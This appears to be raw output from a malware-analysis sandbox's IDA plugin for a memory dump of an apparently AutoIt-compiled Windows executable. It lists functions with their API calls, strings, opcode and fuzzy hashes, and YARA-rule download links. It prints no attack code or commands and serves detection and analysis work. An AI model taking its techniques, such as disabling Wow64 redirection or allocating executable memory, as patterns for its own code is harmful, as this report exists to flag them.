Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$Window
String ID: SysMonthCal32
API String ID: 2326795674-1439706946
Opcode ID: 3b1530be25aa53482341ffba441cadd16a4354f40e7efe25394f3e83bd433dbf
Instruction ID: f54dff7a559ee06631bd11b0689d8f7deb32aa38e7338710b74f0a8c04d65a8f
Opcode Fuzzy Hash: 3b1530be25aa53482341ffba441cadd16a4354f40e7efe25394f3e83bd433dbf
Instruction Fuzzy Hash: 6921F332540229BBDF219F54DC42FEA3BB9EF48724F110154FE186B1D0DAB5AC51CBA0

Function 00B27B93 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B27C4A
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B27C58
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B27C5F

Strings

msctls_updown32, xrefs: 00B27BC4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: f54fec5325aa2af09789ffb8c0befae42cfdbe17288cd1d15a8d505f5117be34
Instruction ID: ac966d9afa437e31182304a6bdb38e9985224e4b071c03dafa024fb87f31ec49
Opcode Fuzzy Hash: f54fec5325aa2af09789ffb8c0befae42cfdbe17288cd1d15a8d505f5117be34
Instruction Fuzzy Hash: 8F214AB5604219AFDB21DF28ECC1DA637EDEF5A354B140499FA059B3A1CB71EC11CBA0

Function 00B26CB0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B26D3B
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B26D4B
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B26D70

Strings

Listbox, xrefs: 00B26D08

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: b768242928a9ddf5fc9d19d532431cf33be3cb901df68e39316e173ab3e71e80
Instruction ID: 75e4430449064e0c9f8acd1db238f02e50837a8d51a25f99b48b4ba8a2a1f931
Opcode Fuzzy Hash: b768242928a9ddf5fc9d19d532431cf33be3cb901df68e39316e173ab3e71e80
Instruction Fuzzy Hash: 3C21A732610128BFDF119F54DC45FBB37BAEF89750F018174F9495B1A0CA719C5187A0

Function 00B2770E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B27772
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B27787
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B27794

Strings

msctls_trackbar32, xrefs: 00B27749

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 3784149c1d29086620d194b4d7e5b36d98c53e5cce44d0e623a0b51b3ab672ab
Instruction ID: 25cd24e65c633be1c90c07cc6fa51b1c840abcf6194ccda5726ff2f362840107
Opcode Fuzzy Hash: 3784149c1d29086620d194b4d7e5b36d98c53e5cce44d0e623a0b51b3ab672ab
Instruction Fuzzy Hash: 5C113632240209BFEF209F60DC05FEB37A8EF89B54F010528FA45A60E0CA72EC11CB24

Function 00AA4C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4B83,?), ref: 00AA4C44
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00AA4C56

Strings

kernel32.dll, xrefs: 00AA4C3F
Wow64RevertWow64FsRedirection, xrefs: 00AA4C50

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: f73e724e2361d1859d7e9dfb4e191d6d3ff48be7d8224b7f55153bc6871f6b41
Instruction ID: 7c8608807c56ae40810fd5d69eec8f281f4f208d336ad5f58cad96fc2c1d4fb5
Opcode Fuzzy Hash: f73e724e2361d1859d7e9dfb4e191d6d3ff48be7d8224b7f55153bc6871f6b41
Instruction Fuzzy Hash: 35D01230550713CFD7305F31D90975676E4AF09753B51887DA499D71B0EBB0D480C651

Function 00AA4C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,00AA4BD0,?,00AA4DEF,?,00B652F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00AA4C11
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00AA4C23

Strings

kernel32.dll, xrefs: 00AA4C0C
Wow64DisableWow64FsRedirection, xrefs: 00AA4C1D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 2574300362-3689287502
Opcode ID: 040b91048cf9b9bf6747fbf9f3c7dfe2a3ede17a4678e00f242cdcfbb056a331
Instruction ID: a96e49dc0cdc35bff353a35d60d8f4d358790fda1fe0b45020a28b5430d3d280
Opcode Fuzzy Hash: 040b91048cf9b9bf6747fbf9f3c7dfe2a3ede17a4678e00f242cdcfbb056a331
Instruction Fuzzy Hash: 27D0EC30511713CFD7206F71D908756B6E5EF09752B518879A48AD71A0EBB0D481C650

Function 00B20DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll,?,00B21039), ref: 00B20DF5
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00B20E07

Strings

RegDeleteKeyExW, xrefs: 00B20E01
advapi32.dll, xrefs: 00B20DF0

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2574300362-4033151799
Opcode ID: a52a916ec8587662921a9c3dc9d01e7e3c1902e5aa9ec6a37dafd9e065224caf
Instruction ID: e06abc18f1fa7ef2ca3d60ffa772503a76f6344dfe2aba29595f194147585358
Opcode Fuzzy Hash: a52a916ec8587662921a9c3dc9d01e7e3c1902e5aa9ec6a37dafd9e065224caf
Instruction Fuzzy Hash: 8FD0EC70910723CFD7206B75E808796B6E5AF14753F518CBE9986E2161EAB4D8A0C650

Function 00B190E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,00000001,00B18CF4,?,00B2F910), ref: 00B190EE
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00B19100

Strings

kernel32.dll, xrefs: 00B190E9
GetModuleHandleExW, xrefs: 00B190FA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 2574300362-199464113
Opcode ID: 7e10bd1cc9f471313a26b52b66e5f63264b572b2952366bc51910c331b7716aa
Instruction ID: 4f88d4a58cb62513beb87d04cd6ae2605843ef76b94ee1a97b7ea1b85ce95f4c
Opcode Fuzzy Hash: 7e10bd1cc9f471313a26b52b66e5f63264b572b2952366bc51910c331b7716aa
Instruction Fuzzy Hash: 65D01234510713EFE7209F31D81D75676E5EF05752B558CB99485E7560EA70C4D0C650

Function 00AE1714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00AE1718
__swprintf.LIBCMT ref: 00AE1749

Strings

WIN_XPe, xrefs: 00AE1788
%.3d, xrefs: 00AE1723

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: LocalTime__swprintf
String ID: %.3d$WIN_XPe
API String ID: 2070861257-2409531811
Opcode ID: 932538e9c0d50e82f3bd1fc0bcdcc3897281729a2085abfbd0ecbc56e04c4c74
Instruction ID: 02756106ff2c34507e3fb3774975b01b44a3eb81323e1c02d4bb608b222dc687
Opcode Fuzzy Hash: 932538e9c0d50e82f3bd1fc0bcdcc3897281729a2085abfbd0ecbc56e04c4c74
Instruction Fuzzy Hash: FDD012718041A9FBCB1497919889DBD77BCA709712F101462B402A2140E2358794DE21

Function 00AF717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction ID: 68c20efa1287363b7250339d16156a47ce2b1a2ae07e2b00767dde33872b5d50
Opcode Fuzzy Hash: 4eef3e53ee2302b32f251418c8334fcf3634f3fd590ed15d9468c540d9186dd6
Instruction Fuzzy Hash: E5C12675A0421AEFCB14CFA8C884EAEBBB5FF48714B158598F905EB251D730ED81DB90

Function 00B1E02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?), ref: 00B1E0BE
CharLowerBuffW.USER32(?,?), ref: 00B1E101

Part of subcall function 00B1D7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00B1D7C5

VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00B1E301
_memmove.LIBCMT ref: 00B1E314

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharLower$AllocVirtual_memmove
String ID:
API String ID: 3659485706-0
Opcode ID: 7fd643eb3ee8e24597ced15ef2f19661f6c8a70867dbe7c98c39eb0652c1f249
Instruction ID: a1ecbc505bcf42ee802b546344396f526fa157f6f7560b48530c076784b840cf
Opcode Fuzzy Hash: 7fd643eb3ee8e24597ced15ef2f19661f6c8a70867dbe7c98c39eb0652c1f249
Instruction Fuzzy Hash: 5BC15B71608301DFC715DF28C480A6ABBE4FF89714F5489ADF8A99B351D731E946CB81

Function 00B18093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B180C3
CoUninitialize.OLE32 ref: 00B180CE

Part of subcall function 00AFD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00AFD5D4

VariantInit.OLEAUT32(?), ref: 00B180D9
VariantClear.OLEAUT32(?), ref: 00B183AA

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
String ID:
API String ID: 780911581-0
Opcode ID: e7c2ffe25ff022d3b33c1aba3001f0fd6976f50837c45478b1919878db321186
Instruction ID: 0f782fc0e40c5562af3fbd499eb48073e8f1932ad6c69a3b0e26827b45cce9aa
Opcode Fuzzy Hash: e7c2ffe25ff022d3b33c1aba3001f0fd6976f50837c45478b1919878db321186
Instruction Fuzzy Hash: 65A178756047019FCB00DF64C981B6AB7E4FF8A324F548498F9969B3A1CB34ED45CB86

Function 00AF7530 Relevance: 6.2, APIs: 4, Instructions: 231COMMON

Download Yara Rule

APIs

ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF76EA
CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7702
CLSIDFromProgID.OLE32(?,?,00000000,00B2FB80,000000FF,?,00000000,00000800,00000000,?,00B32C7C,?), ref: 00AF7727
_memcmp.LIBCMT ref: 00AF7748

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: FromProg$FreeTask_memcmp
String ID:
API String ID: 314563124-0
Opcode ID: 1038302489362de796e71af3669580d22747f81ae7652815e11b6b91c0ff27d2
Instruction ID: 20bfe64bdca0915d7d4862afe77616a2c6d3b0406de0146fefed285513191189
Opcode Fuzzy Hash: 1038302489362de796e71af3669580d22747f81ae7652815e11b6b91c0ff27d2
Instruction Fuzzy Hash: 1B81C775A00109EFCB04DFE8C984EAEB7B9FF89315B204598F505AB250DB71AE06CB60

Function 00AF687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00AF688E
SysAllocString.OLEAUT32(00000000), ref: 00AF6937
VariantCopy.OLEAUT32 ref: 00AF6966
VariantClear.OLEAUT32(?), ref: 00AF698D

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 56951718eb3b7d1d14b33e571e7406c2c402925dde02ba67e95c523ce9e69506
Instruction ID: 95649038081597fcfd35b8cdf09229100139fc7747d9fc8b8a37a59df2bc992a
Opcode Fuzzy Hash: 56951718eb3b7d1d14b33e571e7406c2c402925dde02ba67e95c523ce9e69506
Instruction Fuzzy Hash: 9251AF7470070ADADB24AFA5D891A3AF3F9AF45350F20D81FF696DB291DB70D8408711

Function 00B297F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(014BF0A0,?), ref: 00B29863
ScreenToClient.USER32(00000002,00000002), ref: 00B29896
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00B29903

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID:
API String ID: 3880355969-0
Opcode ID: 19c4aac426d69d4a488c01651e2b72ab052edb4dcfa371d199a058988a882f5e
Instruction ID: f964732a050dd0e1de6bbfacf91c2f17e7fecba6c2b31bdb0dfa8544d00b3ae2
Opcode Fuzzy Hash: 19c4aac426d69d4a488c01651e2b72ab052edb4dcfa371d199a058988a882f5e
Instruction Fuzzy Hash: 81512E74A00219EFCF24CF58D984AAE7BF5FF45360F1481A9F8599B2A0D731AD91CB90

Function 00AF9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00AF9AD2
__itow.LIBCMT ref: 00AF9B03

Part of subcall function 00AF9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00AF9DBE

SendMessageW.USER32(?,0000110A,00000001,?), ref: 00AF9B6C
__itow.LIBCMT ref: 00AF9BC3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$__itow
String ID:
API String ID: 3379773720-0
Opcode ID: 048f709c5a089d0fea179b4aa8789bc9a0a874433b44f5fe3ea73eb043a34c81
Instruction ID: 0774a094f59c38f5a19026dbdc847f6f3c686d5f338913584b436e049b5690a3
Opcode Fuzzy Hash: 048f709c5a089d0fea179b4aa8789bc9a0a874433b44f5fe3ea73eb043a34c81
Instruction Fuzzy Hash: 02417C70A0020CABDF25EF94D945BFF7BB9EF45760F000069FA05A7291DB709A45CBA1

Function 00B169AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON

Download Yara Rule

APIs

socket.WSOCK32(00000002,00000002,00000011), ref: 00B169D1
WSAGetLastError.WSOCK32(00000000), ref: 00B169E1

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

#21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00B16A45
WSAGetLastError.WSOCK32(00000000), ref: 00B16A51

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorLast$__itow__swprintfsocket
String ID:
API String ID: 2214342067-0
Opcode ID: 40f305e7e21676600c74373ececbae9a48477299e76c5092e4b8e6857a276005
Instruction ID: bd0be134f5307a5a96ca0576347d846ef33b29e8d5004068fd355f8fce3fc7fa
Opcode Fuzzy Hash: 40f305e7e21676600c74373ececbae9a48477299e76c5092e4b8e6857a276005
Instruction Fuzzy Hash: 8841C135700200AFEB21AF24CD86F7A77E8DF09B10F448068FA19AF2D2DB789D018791

Function 00B1641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON

Download Yara Rule

APIs

#16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00B2F910), ref: 00B164A7
_strlen.LIBCMT ref: 00B164D9

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: _strlen
String ID:
API String ID: 4218353326-0
Opcode ID: 89a18d186192a298784c2c833b9037e4e437d3b6d5a99ddd01fd4eb897bea3b5
Instruction ID: 245bada6499fe4db5fa27a0eadd6bd1a8b2436d7ea7d41b4d0cea6114f74deb6
Opcode Fuzzy Hash: 89a18d186192a298784c2c833b9037e4e437d3b6d5a99ddd01fd4eb897bea3b5
Instruction Fuzzy Hash: DD417E31A00108ABCB14EBA8DD95FFEB7E9AF15310F5481A9F9199B2D2DB30AD45CB50

Function 00B0B7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON

Download Yara Rule

APIs

CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00B0B89E
GetLastError.KERNEL32(?,00000000), ref: 00B0B8C4
DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00B0B8E9
